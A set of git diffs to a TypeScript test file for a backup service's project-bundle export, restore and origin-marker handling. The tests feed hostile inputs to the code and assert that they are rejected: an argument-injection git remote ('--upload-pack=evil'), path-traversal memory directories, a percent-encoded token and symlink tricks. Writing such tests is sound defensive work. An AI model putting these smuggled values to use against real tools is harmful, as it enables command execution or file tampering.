+++ b/src/node/services/backup/payload.test.ts
@@ -19,6 +19,7 @@ import {
   MAX_BACKUP_PATH_DEPTH,
   MAX_BACKUP_TOTAL_BYTES,
   PROJECT_BUNDLE_DIR,
+  ProjectMemoryWriteError,
   REDACTED_BACKUP_VALUE,
   backupCommandApprovalToken,
   backupSecretApprovalDigest,
@@ -32,6 +33,7 @@ import {
   planRestoreWrites,
   projectBundleExists,
   projectImportToken,
+  projectMemoryRelPath,
   readProjectBundle,
   rekeyProjectMemoryPath,
   serializeBackupPreferences,
@@ -51,6 +53,7 @@ import {
   type BackupProjectBundleEntry,
 } from "@/common/config/schemas/settingsBackup";
 import { captureRejection, writeFixtureFile } from "./testHelpers";
+import { MEMORY_MAX_FILE_BYTES, MEMORY_MAX_FILES_PER_SCOPE } from "@/common/constants/memory";
 
 async function isExecutable(filePath: string): Promise<boolean> {
   return ((await fs.stat(filePath)).mode & 0o111) !== 0;
@@ -3599,6 +3602,57 @@ describe("project bundle", () => {
     expect((error as Error).message).toContain("memory directory");
   });
 
+  it("rejects oversized repository-controlled project metadata", async () => {
+    const oversized = [
+      { name: "x".repeat(257) },
+      { path: `/home/${"p".repeat(1024)}` },
+      { gitRemote: `https://example.com/${"r".repeat(2048)}` },
+    ];
+    for (const override of oversized) {
+      const projectPath = override.path ?? "/home/dev/src/alpha";
+      await rewriteBundleManifest(managedDir, {
+        schemaVersion: 1,
+        projects: [
+          {
+            path: projectPath,
+            name: "alpha",
+            memoryDir: projectMemoryDirName(projectPath),
+            ...override,
+          },
+        ],
+        files: [],
+      });
+      const error = await captureRejection(readProjectBundle(managedDir));
+      expect((error as { code?: string }).code).toBe("INVALID_BACKUP");
+    }
+  });
+
+  it("skips memory files past the memory read limit only when exporting", async () => {
+    const entry = entryFor("/home/dev/src/alpha");
+    await writeFixtureFile(muxRoot, `memory/project/${entry.memoryDir}/small.md`, "fine\n");
+    await fs.writeFile(
+      path.join(muxRoot, "memory", "project", entry.memoryDir, "huge.md"),
+      Buffer.alloc(MEMORY_MAX_FILE_BYTES + 1, "x")
+    );
+
+    const exported = await collectProjectBundle(muxRoot, [entry], {
+      skipOversizedMemoryFiles: true,
+    });
+    expect(exported.files.map((file) => file.path)).toEqual([
+      `memory/project/${entry.memoryDir}/small.md`,
+    ]);
+    expect(exported.manifest.files.map((file) => file.path)).toEqual([
+      `memory/project/${entry.memoryDir}/small.md`,
+    ]);
+    // Snapshots keep everything: an oversized local file a restore overwrites must stay
+    // recoverable.
+    const snapshot = await collectProjectBundle(muxRoot, [entry]);
+    expect(snapshot.files.map((file) => file.path)).toEqual([
+      `memory/project/${entry.memoryDir}/huge.md`,
+      `memory/project/${entry.memoryDir}/small.md`,
+    ]);
+  });
+
   it("rejects unsafe memory directory segments", async () => {
     for (const memoryDir of ["..", "evil/../../up", "nul", ".hidden-abcdef123456"]) {
       await rewriteBundleManifest(managedDir, {
@@ -3812,6 +3866,102 @@ describe("project bundle", () => {
     expect(
       await fs.readFile(path.join(muxRoot, "memory", "project", targetDir, "existing.md"), "utf-8")
     ).toBe("backup version\n");
+  });
+
+  it("refuses a memory file past the memory read limit before writing anything", async () => {
+    const targetDir = projectMemoryDirName("/home/dev/target");
+    const error = await captureRejection(
+      writeProjectMemoryFiles(
+        muxRoot,
+        [
+          { path: `memory/project/${targetDir}/small.md`, content: Buffer.from("fine\n") },
+          {
+            path: `memory/project/${targetDir}/huge.md`,
+            content: Buffer.alloc(MEMORY_MAX_FILE_BYTES + 1, "x"),
+          },
+        ],
+        { addOnly: false }
+      )
+    );
+    expect((error as Error).message).toContain("memory file limit");
+    expect(error).not.toBeInstanceOf(ProjectMemoryWriteError);
+    // Validation runs before the first write: the acceptable file did not land either.
+    expect(
+      await fs.stat(path.join(muxRoot, "memory", "project", targetDir, "small.md")).then(
+        () => true,
+        () => false
+      )
+    ).toBe(false);
+  });
+
+  it("refuses growing a project scope past the memory file-count limit", async () => {
+    const targetDir = projectMemoryDirName("/home/dev/target");
+    for (let index = 0; index < MEMORY_MAX_FILES_PER_SCOPE - 1; index += 1) {
+      await writeFixtureFile(muxRoot, `memory/project/${targetDir}/n${index}.md`, "x\n");
+    }
+    // Existing files rewritten in place do not count as growth.
+    const rewrite = await writeProjectMemoryFiles(
+      muxRoot,
+      [{ path: `memory/project/${targetDir}/n0.md`, content: Buffer.from("y\n") }],
+      { addOnly: false }
+    );
+    expect(rewrite.written).toEqual([`memory/project/${targetDir}/n0.md`]);
+    // One more fits exactly; two more would exceed the scope limit.
+    const error = await captureRejection(
+      writeProjectMemoryFiles(
+        muxRoot,
+        [
+          { path: `memory/project/${targetDir}/new-a.md`, content: Buffer.from("a\n") },
+          { path: `memory/project/${targetDir}/new-b.md`, content: Buffer.from("b\n") },
+        ],
+        { addOnly: true }
+      )
+    );
+    expect((error as Error).message).toContain("file memory limit");
+    expect(
+      await fs.stat(path.join(muxRoot, "memory", "project", targetDir, "new-a.md")).then(
+        () => true,
+        () => false
+      )
+    ).toBe(false);
+  });
+
+  it("reports partial progress when a write fails midway", async () => {
+    const targetDir = projectMemoryDirName("/home/dev/target");
+    await writeFixtureFile(muxRoot, `memory/project/${targetDir}/kept.md`, "local\n");
+    // The third write's directory creation fails, after "first.md" already landed and
+    // "kept.md" was skipped as a conflict.
+    const realMkdir = fs.mkdir.bind(fs);
+    const mkdir = spyOn(fs, "mkdir").mockImplementation(((target, options) =>
+      String(target).endsWith(`${path.sep}faulty`)
+        ? Promise.reject(new Error("EIO: disk fault"))
+        : realMkdir(target, options)) as typeof fs.mkdir);
+    try {
+      const error = await captureRejection(
+        writeProjectMemoryFiles(
+          muxRoot,
+          [
+            { path: `memory/project/${targetDir}/first.md`, content: Buffer.from("one\n") },
+            { path: `memory/project/${targetDir}/kept.md`, content: Buffer.from("backup\n") },
+            { path: `memory/project/${targetDir}/faulty/inner.md`, content: Buffer.from("x\n") },
+          ],
+          { addOnly: true }
+        )
+      );
+      expect(error).toBeInstanceOf(ProjectMemoryWriteError);
+      const writeError = error as ProjectMemoryWriteError;
+      expect(writeError.message).toContain("disk fault");
+      expect(writeError.written).toEqual([`memory/project/${targetDir}/first.md`]);
+      expect(writeError.skipped).toEqual([`memory/project/${targetDir}/kept.md`]);
+    } finally {
+      mkdir.mockRestore();
+    }
+  });
+
+  it("maps bundle paths to scope-relative memory paths", () => {
+    expect(projectMemoryRelPath("memory/project/alpha-123456789abc/deep/notes.md")).toBe(
+      "deep/notes.md"
+    );
   });
 
   it("refuses memory writes outside the project memory tree", async () => {

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -3601,6 +3601,24 @@ describe("project bundle", () => {
     expect((error as Error).message).toContain("memory directory");
   });
 
+  it("rejects an oversized bundle file path before it reaches the filesystem", async () => {
+    const entry = entryFor("/home/dev/src/alpha");
+    await rewriteBundleManifest(managedDir, {
+      schemaVersion: 1,
+      projects: [entry],
+      files: [
+        {
+          path: `memory/project/${entry.memoryDir}/${"n".repeat(1024)}.md`,
+          sha256: "0".repeat(64),
+        },
+      ],
+    });
+    const error = await captureRejection(readProjectBundle(managedDir));
+    expect((error as { code?: string }).code).toBe("INVALID_BACKUP");
+    // The schema refused it; no ENAMETOOLONG message echoing the path was produced.
+    expect((error as Error).message.length).toBeLessThan(200);
+  });
+
   it("rejects oversized repository-controlled project metadata", async () => {
     const oversized = [
       { name: "x".repeat(257) },
@@ -3943,6 +3961,9 @@ describe("project bundle", () => {
     for (let index = 0; index < MEMORY_MAX_FILES_PER_SCOPE - 1; index += 1) {
       await writeFixtureFile(muxRoot, `memory/project/${targetDir}/n${index}.md`, "x\n");
     }
+    // Hidden entries are invisible to MemoryService and must not count against its limit.
+    await writeFixtureFile(muxRoot, `memory/project/${targetDir}/.DS_Store`, "junk\n");
+    await writeFixtureFile(muxRoot, `memory/project/${targetDir}/.cache/index.md`, "junk\n");
     // Existing files rewritten in place do not count as growth.
     const rewrite = await writeProjectMemoryFiles(
       muxRoot,

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -3848,6 +3848,32 @@ describe("project bundle", () => {
     });
   });
 
+  it("does not bring a superseded association back through the crash fallback", async () => {
+    const a = "/home/dev/src/alpha";
+    const c = "/home/dev/src/gamma";
+    const b = "/home/other/b";
+    const d = "/home/other/d";
+    const registered = new Map([b, d].map((project) => [project, projectMemoryDirName(project)]));
+    // A moves from B to D (completed), then C is imported into D. A's record still names B
+    // as where it came from, and B's stale record still names A.
+    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(b), a);
+    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(d), a);
+    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(d), c);
+
+    // D's record exists and names C, so A's pair was completed and then superseded: A is
+    // unmatched, and in particular not matched back to B, whose memory a matched restore
+    // would otherwise overwrite without approval.
+    const origins = await readProjectMemoryOrigins(muxRoot, registered, [a, c]);
+    expect([...origins.entries()]).toEqual([
+      [c, { projectPath: d, memoryDir: projectMemoryDirName(d) }],
+    ]);
+
+    // Likewise when D is unregistered rather than reassigned.
+    const onlyB = new Map([[b, projectMemoryDirName(b)]]);
+    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(d), a);
+    expect((await readProjectMemoryOrigins(muxRoot, onlyB, [a])).size).toBe(0);
+  });
+
   it("ignores markers that are broken, mis-named, or name an unregistered project", async () => {
     const registeredProject = "/home/other/a";
     const registered = new Map([[registeredProject, projectMemoryDirName(registeredProject)]]);

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -3786,83 +3786,90 @@ describe("project bundle", () => {
     );
   });
 
-  it("puts the source's previous record back when the project-side write fails", async () => {
-    const source = "/home/dev/src/alpha";
+  it("puts the project's previous record back when the source-side write fails", async () => {
+    const a = "/home/dev/src/alpha";
+    const c = "/home/dev/src/gamma";
     const fresh = "/home/dev/src/epsilon";
     const b = "/home/other/b";
     const d = "/home/other/d";
-    const registered = new Map([b, d].map((project) => [project, projectMemoryDirName(project)]));
-    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(b), source);
-    // A directory squats on D's record, so only the second of the two writes can fail.
-    await fs.mkdir(originTargetPath(projectMemoryDirName(d)), { recursive: true });
+    const f = "/home/other/f";
+    const registered = new Map(
+      [b, d, f].map((project) => [project, projectMemoryDirName(project)])
+    );
+    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(b), a);
+    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(d), c);
+    // A directory squats where the source's record is staged, so only the second of the two
+    // writes can fail.
+    for (const source of [a, fresh]) {
+      await fs.mkdir(`${originMarkerPath(source)}.tmp`, { recursive: true });
+    }
 
-    // Moving the source from B to D fails halfway: the source's record had already been
-    // replaced, and without being put back neither A→B nor A→D would have two agreeing
-    // halves — a failed import would have cost the project its association.
+    // Moving A from B to D fails halfway: D's record had already been replaced, and without
+    // being put back a failed import would have cost D the association it had with C.
     const moved = await captureRejection(
-      writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(d), source)
+      writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(d), a)
     );
     expect(moved).toBeInstanceOf(Error);
-    expect((await readProjectMemoryOrigins(muxRoot, registered, [source])).get(source)).toEqual({
-      projectPath: b,
-      memoryDir: projectMemoryDirName(b),
-    });
+    expect([...(await readProjectMemoryOrigins(muxRoot, registered, [a, c])).entries()]).toEqual([
+      [a, { projectPath: b, memoryDir: projectMemoryDirName(b) }],
+      [c, { projectPath: d, memoryDir: projectMemoryDirName(d) }],
+    ]);
 
     // A first-ever association that fails the same way leaves no half record behind.
-    await captureRejection(writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(d), fresh));
-    expect(await fs.lstat(originMarkerPath(fresh)).catch(() => null)).toBeNull();
-    const leftovers = (await fs.readdir(path.join(muxRoot, "memory", ".backup-origins"))).filter(
-      (name) => name.endsWith(".tmp")
+    await captureRejection(writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(f), fresh));
+    expect(await fs.lstat(originTargetPath(projectMemoryDirName(f))).catch(() => null)).toBeNull();
+    const originsDir = path.join(muxRoot, "memory", ".backup-origins");
+    const leftovers = (await fs.readdir(originsDir, { withFileTypes: true })).filter(
+      (entry) => entry.isFile() && entry.name.endsWith(".tmp")
     );
     expect(leftovers).toEqual([]);
   });
 
   it("keeps the previous association when a re-import was interrupted between its two writes", async () => {
-    const source = "/home/dev/src/alpha";
-    const b = "/home/other/b";
-    const d = "/home/other/d";
-    const registered = new Map([b, d].map((project) => [project, projectMemoryDirName(project)]));
-    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(b), source);
-    // A crash after the source's record was replaced but before D's record landed: the
-    // source names D (and B as where it came from), D's record does not exist, B's still
-    // names the source.
-    await fs.writeFile(
-      originMarkerPath(source),
-      JSON.stringify({
-        sourcePath: source,
-        memoryDir: projectMemoryDirName(d),
-        previousMemoryDir: projectMemoryDirName(b),
-      }),
-      "utf-8"
-    );
-
-    expect((await readProjectMemoryOrigins(muxRoot, registered, [source])).get(source)).toEqual({
-      projectPath: b,
-      memoryDir: projectMemoryDirName(b),
-    });
-    // Completing the pair (the retry) moves the association to D.
-    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(d), source);
-    expect((await readProjectMemoryOrigins(muxRoot, registered, [source])).get(source)).toEqual({
-      projectPath: d,
-      memoryDir: projectMemoryDirName(d),
-    });
-  });
-
-  it("does not bring a superseded association back through the crash fallback", async () => {
     const a = "/home/dev/src/alpha";
     const c = "/home/dev/src/gamma";
     const b = "/home/other/b";
     const d = "/home/other/d";
     const registered = new Map([b, d].map((project) => [project, projectMemoryDirName(project)]));
-    // A moves from B to D (completed), then C is imported into D. A's record still names B
-    // as where it came from, and B's stale record still names A.
+    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(b), a);
+    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(d), c);
+    // A crash while moving A from B to D, after D's record was replaced but before A's was:
+    // D names A, while A's record and B's both still name each other.
+    await fs.writeFile(
+      originTargetPath(projectMemoryDirName(d)),
+      JSON.stringify({ sourcePath: a, memoryDir: projectMemoryDirName(d) }),
+      "utf-8"
+    );
+
+    // A keeps B — whether or not D had an association of its own before, which is what a
+    // fallback rule keyed on the source's record could not tell from a superseded one. C's
+    // claim on D is void, as the completed import would have made it.
+    expect([...(await readProjectMemoryOrigins(muxRoot, registered, [a, c])).entries()]).toEqual([
+      [a, { projectPath: b, memoryDir: projectMemoryDirName(b) }],
+    ]);
+    // Completing the pair (the retry) moves the association to D.
+    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(d), a);
+    expect((await readProjectMemoryOrigins(muxRoot, registered, [a])).get(a)).toEqual({
+      projectPath: d,
+      memoryDir: projectMemoryDirName(d),
+    });
+  });
+
+  it("does not match a source back to a project it was moved out of", async () => {
+    const a = "/home/dev/src/alpha";
+    const c = "/home/dev/src/gamma";
+    const b = "/home/other/b";
+    const d = "/home/other/d";
+    const registered = new Map([b, d].map((project) => [project, projectMemoryDirName(project)]));
+    // A moves from B to D (completed), then C is imported into D. B's stale record still
+    // names A.
     await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(b), a);
     await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(d), a);
     await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(d), c);
 
-    // D's record exists and names C, so A's pair was completed and then superseded: A is
-    // unmatched, and in particular not matched back to B, whose memory a matched restore
-    // would otherwise overwrite without approval.
+    // A's pair was completed and then superseded: A is unmatched, and in particular not
+    // matched back to B, whose memory a matched restore would otherwise overwrite without
+    // approval.
     const origins = await readProjectMemoryOrigins(muxRoot, registered, [a, c]);
     expect([...origins.entries()]).toEqual([
       [c, { projectPath: d, memoryDir: projectMemoryDirName(d) }],

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -3722,7 +3722,7 @@ describe("project bundle", () => {
     await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(second), "/home/dev/src/alpha");
     await writeFixtureFile(
       muxRoot,
-      `memory/project/${projectMemoryDirName(broken)}/.backup-origin.json`,
+      `memory/.backup-origins/${projectMemoryDirName(broken)}.json`,
       "{ not json"
     );
 
@@ -3799,6 +3799,46 @@ describe("project bundle", () => {
       `memory/project/${entry.memoryDir}/huge.md`,
       `memory/project/${entry.memoryDir}/small.md`,
     ]);
+  });
+
+  it("round-trips a project whose basename starts with a dot", async () => {
+    // `~/.dotfiles` legitimately yields `.dotfiles-<hash>`; the hidden-name rule applies to
+    // memory files, not to this project-derived directory segment.
+    const entry = entryFor("/home/dev/.dotfiles");
+    expect(entry.memoryDir.startsWith(".dotfiles-")).toBe(true);
+    await writeFixtureFile(muxRoot, `memory/project/${entry.memoryDir}/notes.md`, "dots\n");
+
+    const bundle = await collectProjectBundle(muxRoot, [entry], { portableMemoryOnly: true });
+    expect(bundle.files.map((file) => file.path)).toEqual([
+      `memory/project/${entry.memoryDir}/notes.md`,
+    ]);
+    await writeBundleTo(managedDir, bundle);
+    const read = await readProjectBundle(managedDir);
+    expect(read?.files[0]?.content.toString("utf-8")).toBe("dots\n");
+    // Hidden files inside the project stay excluded; the directory itself is fine.
+    const restored = await writeProjectMemoryFiles(
+      muxRoot,
+      [{ path: `memory/project/${entry.memoryDir}/other.md`, content: Buffer.from("x\n") }],
+      { addOnly: true }
+    );
+    expect(restored.written).toEqual([`memory/project/${entry.memoryDir}/other.md`]);
+    const hidden = await captureRejection(
+      writeProjectMemoryFiles(
+        muxRoot,
+        [{ path: `memory/project/${entry.memoryDir}/.env`, content: Buffer.from("x\n") }],
+        { addOnly: true }
+      )
+    );
+    expect((hidden as Error).message).toContain("disallowed path");
+  });
+
+  it("treats a symlinked sidecar manifest as absent without following it", async () => {
+    await fs.mkdir(path.join(managedDir, PROJECT_BUNDLE_DIR), { recursive: true });
+    const outside = path.join(tempDir, "outside-manifest.json");
+    await fs.writeFile(outside, "{}", "utf-8");
+    await fs.symlink(outside, path.join(managedDir, PROJECT_BUNDLE_DIR, "manifest.json"));
+    expect(await projectBundleExists(managedDir)).toBe(false);
+    expect(await readProjectBundle(managedDir)).toBeNull();
   });
 
   it("rejects unsafe memory directory segments", async () => {
@@ -4159,6 +4199,8 @@ describe("sanitizeBackupGitRemote", () => {
       "../relative/repo",
       "git@github.com:dev/repo.git --upload-pack=evil",
       "https://github.com/dev/repo.git?token=abc",
+      // A percent-encoded token would evade the publish-time pattern scan of the manifest.
+      `https://example.com/%67hp_${"a".repeat(24)}/repo.git`,
     ]) {
       expect(sanitizeBackupGitRemote(remote)).toBeUndefined();
     }

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -29,8 +29,11 @@ import {
   createBackupPayload,
   localOnlyPayloadFiles,
   mergeBackupPreferences,
+  matchedProjectWrites,
   planProjectBundleRestore,
   planRestoreWrites,
+  readProjectMemoryOrigins,
+  writeProjectMemoryOrigin,
   projectBundleExists,
   projectImportToken,
   readProjectBundle,
@@ -3657,6 +3660,59 @@ describe("project bundle", () => {
       const error = await captureRejection(readProjectBundle(managedDir));
       expect((error as { code?: string }).code).toBe("INVALID_BACKUP");
     }
+  });
+
+  it("matches an entry to the local project an earlier import created for it", async () => {
+    const sourceEntry = entryFor("/home/dev/src/alpha");
+    await writeFixtureFile(muxRoot, `memory/project/${sourceEntry.memoryDir}/notes.md`, "v2\n");
+    const bundle = await collectProjectBundle(muxRoot, [sourceEntry]);
+
+    const localProject = "/home/other/checkouts/alpha";
+    const localDir = projectMemoryDirName(localProject);
+    const registered = new Map([[localProject, localDir]]);
+
+    // No marker: the entry is an import candidate on this machine.
+    expect(planProjectBundleRestore(bundle, registered).imports).toHaveLength(1);
+
+    await writeProjectMemoryOrigin(muxRoot, localDir, sourceEntry.path);
+    const origins = await readProjectMemoryOrigins(muxRoot, registered);
+    expect(origins.get(sourceEntry.path)).toEqual({
+      projectPath: localProject,
+      memoryDir: localDir,
+    });
+    const plan = planProjectBundleRestore(bundle, registered, origins);
+    expect(plan.imports).toEqual([]);
+    expect(plan.matched).toHaveLength(1);
+    expect(plan.matched[0]).toMatchObject({ projectPath: localProject, localMemoryDir: localDir });
+    // Writes land in the local project's directory, not the recorded source's.
+    expect(matchedProjectWrites(plan.matched[0]).map((write) => write.path)).toEqual([
+      `memory/project/${localDir}/notes.md`,
+    ]);
+
+    // A marker whose project is no longer registered falls back to an import.
+    expect(planProjectBundleRestore(bundle, new Map(), origins).imports).toHaveLength(1);
+  });
+
+  it("ignores origin markers that are unreadable or claim a source twice", async () => {
+    const first = "/home/other/a";
+    const second = "/home/other/b";
+    const broken = "/home/other/c";
+    const registered = new Map(
+      [first, second, broken].map((project) => [project, projectMemoryDirName(project)])
+    );
+    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(first), "/home/dev/src/alpha");
+    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(second), "/home/dev/src/alpha");
+    await writeFixtureFile(
+      muxRoot,
+      `memory/project/${projectMemoryDirName(broken)}/.backup-origin.json`,
+      "{ not json"
+    );
+
+    const origins = await readProjectMemoryOrigins(muxRoot, registered);
+    // Deterministic: the first project in path order keeps the source.
+    expect([...origins.entries()]).toEqual([
+      ["/home/dev/src/alpha", { projectPath: first, memoryDir: projectMemoryDirName(first) }],
+    ]);
   });
 
   it("skips an oversized memory file without charging the backup budget", async () => {

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -3676,7 +3676,7 @@ describe("project bundle", () => {
     expect(planProjectBundleRestore(bundle, registered).imports).toHaveLength(1);
 
     await writeProjectMemoryOrigin(muxRoot, localDir, sourceEntry.path);
-    const origins = await readProjectMemoryOrigins(muxRoot, registered);
+    const origins = await readProjectMemoryOrigins(muxRoot, registered, [sourceEntry.path]);
     expect(origins.get(sourceEntry.path)).toEqual({
       projectPath: localProject,
       memoryDir: localDir,
@@ -3712,7 +3712,13 @@ describe("project bundle", () => {
     expect(plan.imports.map((item) => item.entry.path)).toEqual([sourceA.path]);
   });
 
-  it("keeps only the newest claim on a source when writing an origin marker", async () => {
+  /** The marker file a source's association is recorded in (keyed by the source's hash). */
+  function originMarkerPath(sourcePath: string): string {
+    const digest = createHash("sha256").update(Buffer.from(sourcePath, "utf-8")).digest("hex");
+    return path.join(muxRoot, "memory", ".backup-origins", `${digest.slice(0, 32)}.json`);
+  }
+
+  it("replaces a source's association when it is imported again elsewhere", async () => {
     const source = "/home/dev/src/alpha";
     const b = "/home/other/b";
     const c = "/home/other/c";
@@ -3721,47 +3727,86 @@ describe("project bundle", () => {
     await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(c), source);
     const registered = new Map([b, c].map((project) => [project, projectMemoryDirName(project)]));
 
-    // B's stale marker was removed when C claimed the source, so re-registering B cannot
-    // revive the older association or make the source ambiguous.
-    expect(
-      await fs
-        .lstat(path.join(muxRoot, "memory", ".backup-origins", `${projectMemoryDirName(b)}.json`))
-        .catch(() => null)
-    ).toBeNull();
-    expect([...(await readProjectMemoryOrigins(muxRoot, registered)).entries()]).toEqual([
+    // One marker per source, so C's import replaced B's claim outright: re-registering B
+    // cannot revive the older association or leave the source claimed twice.
+    expect(await fs.readdir(path.join(muxRoot, "memory", ".backup-origins"))).toEqual([
+      path.basename(originMarkerPath(source)),
+    ]);
+    expect([...(await readProjectMemoryOrigins(muxRoot, registered, [source])).entries()]).toEqual([
       [source, { projectPath: c, memoryDir: projectMemoryDirName(c) }],
     ]);
   });
 
-  it("leaves a source claimed by two registered projects unmatched and ignores broken markers", async () => {
-    const first = "/home/other/a";
-    const second = "/home/other/b";
-    const broken = "/home/other/c";
-    const registered = new Map(
-      [first, second, broken].map((project) => [project, projectMemoryDirName(project)])
-    );
-    // Hand-placed (a copied home): the writer would never leave two claims behind.
-    for (const project of [first, second]) {
-      await writeFixtureFile(
-        muxRoot,
-        `memory/.backup-origins/${projectMemoryDirName(project)}.json`,
-        JSON.stringify({ sourcePath: "/home/dev/src/alpha" })
+  it("keeps the previous association when writing its replacement fails", async () => {
+    if (process.platform === "win32" || process.getuid?.() === 0) return;
+    const source = "/home/dev/src/alpha";
+    const b = "/home/other/b";
+    const c = "/home/other/c";
+    const registered = new Map([b, c].map((project) => [project, projectMemoryDirName(project)]));
+    await writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(b), source);
+    const originsDir = path.join(muxRoot, "memory", ".backup-origins");
+    await fs.chmod(originsDir, 0o555);
+    try {
+      const error = await captureRejection(
+        writeProjectMemoryOrigin(muxRoot, projectMemoryDirName(c), source)
       );
+      expect((error as NodeJS.ErrnoException).code).toBe("EACCES");
+    } finally {
+      await fs.chmod(originsDir, 0o755);
     }
-    await writeFixtureFile(
-      muxRoot,
-      `memory/.backup-origins/${projectMemoryDirName(broken)}.json`,
-      "{ not json"
+    // The failed import must not have cost the earlier project its association.
+    expect((await readProjectMemoryOrigins(muxRoot, registered, [source])).get(source)).toEqual({
+      projectPath: b,
+      memoryDir: projectMemoryDirName(b),
+    });
+    expect(await fs.readdir(originsDir)).toEqual([path.basename(originMarkerPath(source))]);
+  });
+
+  it("ignores markers that are broken, mis-named, or name an unregistered project", async () => {
+    const registeredProject = "/home/other/a";
+    const registered = new Map([[registeredProject, projectMemoryDirName(registeredProject)]]);
+    const broken = "/home/dev/src/broken";
+    const misnamed = "/home/dev/src/misnamed";
+    const orphaned = "/home/dev/src/orphaned";
+    await fs.mkdir(path.join(muxRoot, "memory", ".backup-origins"), { recursive: true });
+    await fs.writeFile(originMarkerPath(broken), "{ not json", "utf-8");
+    // Sits at one source's name but records another: neither source's marker.
+    await fs.writeFile(
+      originMarkerPath(misnamed),
+      JSON.stringify({ sourcePath: broken, memoryDir: projectMemoryDirName(registeredProject) }),
+      "utf-8"
+    );
+    await fs.writeFile(
+      originMarkerPath(orphaned),
+      JSON.stringify({ sourcePath: orphaned, memoryDir: projectMemoryDirName("/gone") }),
+      "utf-8"
     );
 
-    // Ambiguous: neither project is matched, so a restore re-offers the source as an import
-    // instead of overwriting whichever project happens to sort first.
-    expect((await readProjectMemoryOrigins(muxRoot, registered)).size).toBe(0);
+    const origins = await readProjectMemoryOrigins(muxRoot, registered, [
+      broken,
+      misnamed,
+      orphaned,
+    ]);
+    expect(origins.size).toBe(0);
+  });
+
+  it("refuses a marker the reader's byte cap would reject", async () => {
+    // Past the schema's 1024-character path cap and fully escaped: defensive only, since a
+    // parsed bundle can never carry it, but an import must not succeed with an unreadable marker.
+    const error = await captureRejection(
+      writeProjectMemoryOrigin(
+        muxRoot,
+        projectMemoryDirName("/home/other/a"),
+        "\u0001".repeat(2000)
+      )
+    );
+    expect((error as Error).message).toContain("too large");
   });
 
   it("refuses an origin marker behind a symlinked directory or marker", async () => {
     const localProject = "/home/other/a";
     const localDir = projectMemoryDirName(localProject);
+    const source = "/home/dev/src/alpha";
     const outside = path.join(tempDir, "outside-origins");
     await fs.mkdir(outside, { recursive: true });
     const originsDir = path.join(muxRoot, "memory", ".backup-origins");
@@ -3769,9 +3814,7 @@ describe("project bundle", () => {
 
     // A copied or corrupted Xum home left `.backup-origins` itself as a symlink.
     await fs.symlink(outside, originsDir, "dir");
-    const viaDir = await captureRejection(
-      writeProjectMemoryOrigin(muxRoot, localDir, "/home/dev/src/alpha")
-    );
+    const viaDir = await captureRejection(writeProjectMemoryOrigin(muxRoot, localDir, source));
     expect((viaDir as Error).message).toContain("symlink");
     expect(await fs.readdir(outside)).toEqual([]);
 
@@ -3779,17 +3822,22 @@ describe("project bundle", () => {
     await fs.unlink(originsDir);
     await fs.mkdir(originsDir);
     const victim = path.join(outside, "victim.json");
-    await fs.writeFile(victim, JSON.stringify({ sourcePath: "/home/dev/src/alpha" }), "utf-8");
-    await fs.symlink(victim, path.join(originsDir, `${localDir}.json`));
-    const viaMarker = await captureRejection(
-      writeProjectMemoryOrigin(muxRoot, localDir, "/home/dev/src/planted")
+    await fs.writeFile(
+      victim,
+      JSON.stringify({ sourcePath: source, memoryDir: localDir }),
+      "utf-8"
     );
+    await fs.symlink(victim, originMarkerPath(source));
+    const viaMarker = await captureRejection(writeProjectMemoryOrigin(muxRoot, localDir, source));
     expect((viaMarker as Error).message).toContain("symlink");
     expect(JSON.parse(await fs.readFile(victim, "utf-8"))).toEqual({
-      sourcePath: "/home/dev/src/alpha",
+      sourcePath: source,
+      memoryDir: localDir,
     });
-    // Nor is the linked file's content trusted as this project's origin.
-    const origins = await readProjectMemoryOrigins(muxRoot, new Map([[localProject, localDir]]));
+    // Nor is the linked file's content trusted as this source's origin.
+    const origins = await readProjectMemoryOrigins(muxRoot, new Map([[localProject, localDir]]), [
+      source,
+    ]);
     expect(origins.size).toBe(0);
   });
 

--- a/src/node/services/backup/payload.test.ts
+++ b/src/node/services/backup/payload.test.ts
@@ -3627,6 +3627,26 @@ describe("project bundle", () => {
     }
   });
 
+  it("skips an oversized memory file without charging the backup budget", async () => {
+    const entry = entryFor("/home/dev/src/alpha");
+    await writeFixtureFile(muxRoot, `memory/project/${entry.memoryDir}/small.md`, "fine\n");
+    // Past the per-file backup budget outright: reading it would fail the whole collection.
+    await fs.writeFile(
+      path.join(muxRoot, "memory", "project", entry.memoryDir, "corrupt.md"),
+      Buffer.alloc(MAX_BACKUP_FILE_BYTES + 1, "x")
+    );
+
+    const exported = await collectProjectBundle(muxRoot, [entry], {
+      skipOversizedMemoryFiles: true,
+    });
+    expect(exported.files.map((file) => file.path)).toEqual([
+      `memory/project/${entry.memoryDir}/small.md`,
+    ]);
+    // Only the export path skips; a snapshot collection still surfaces the problem.
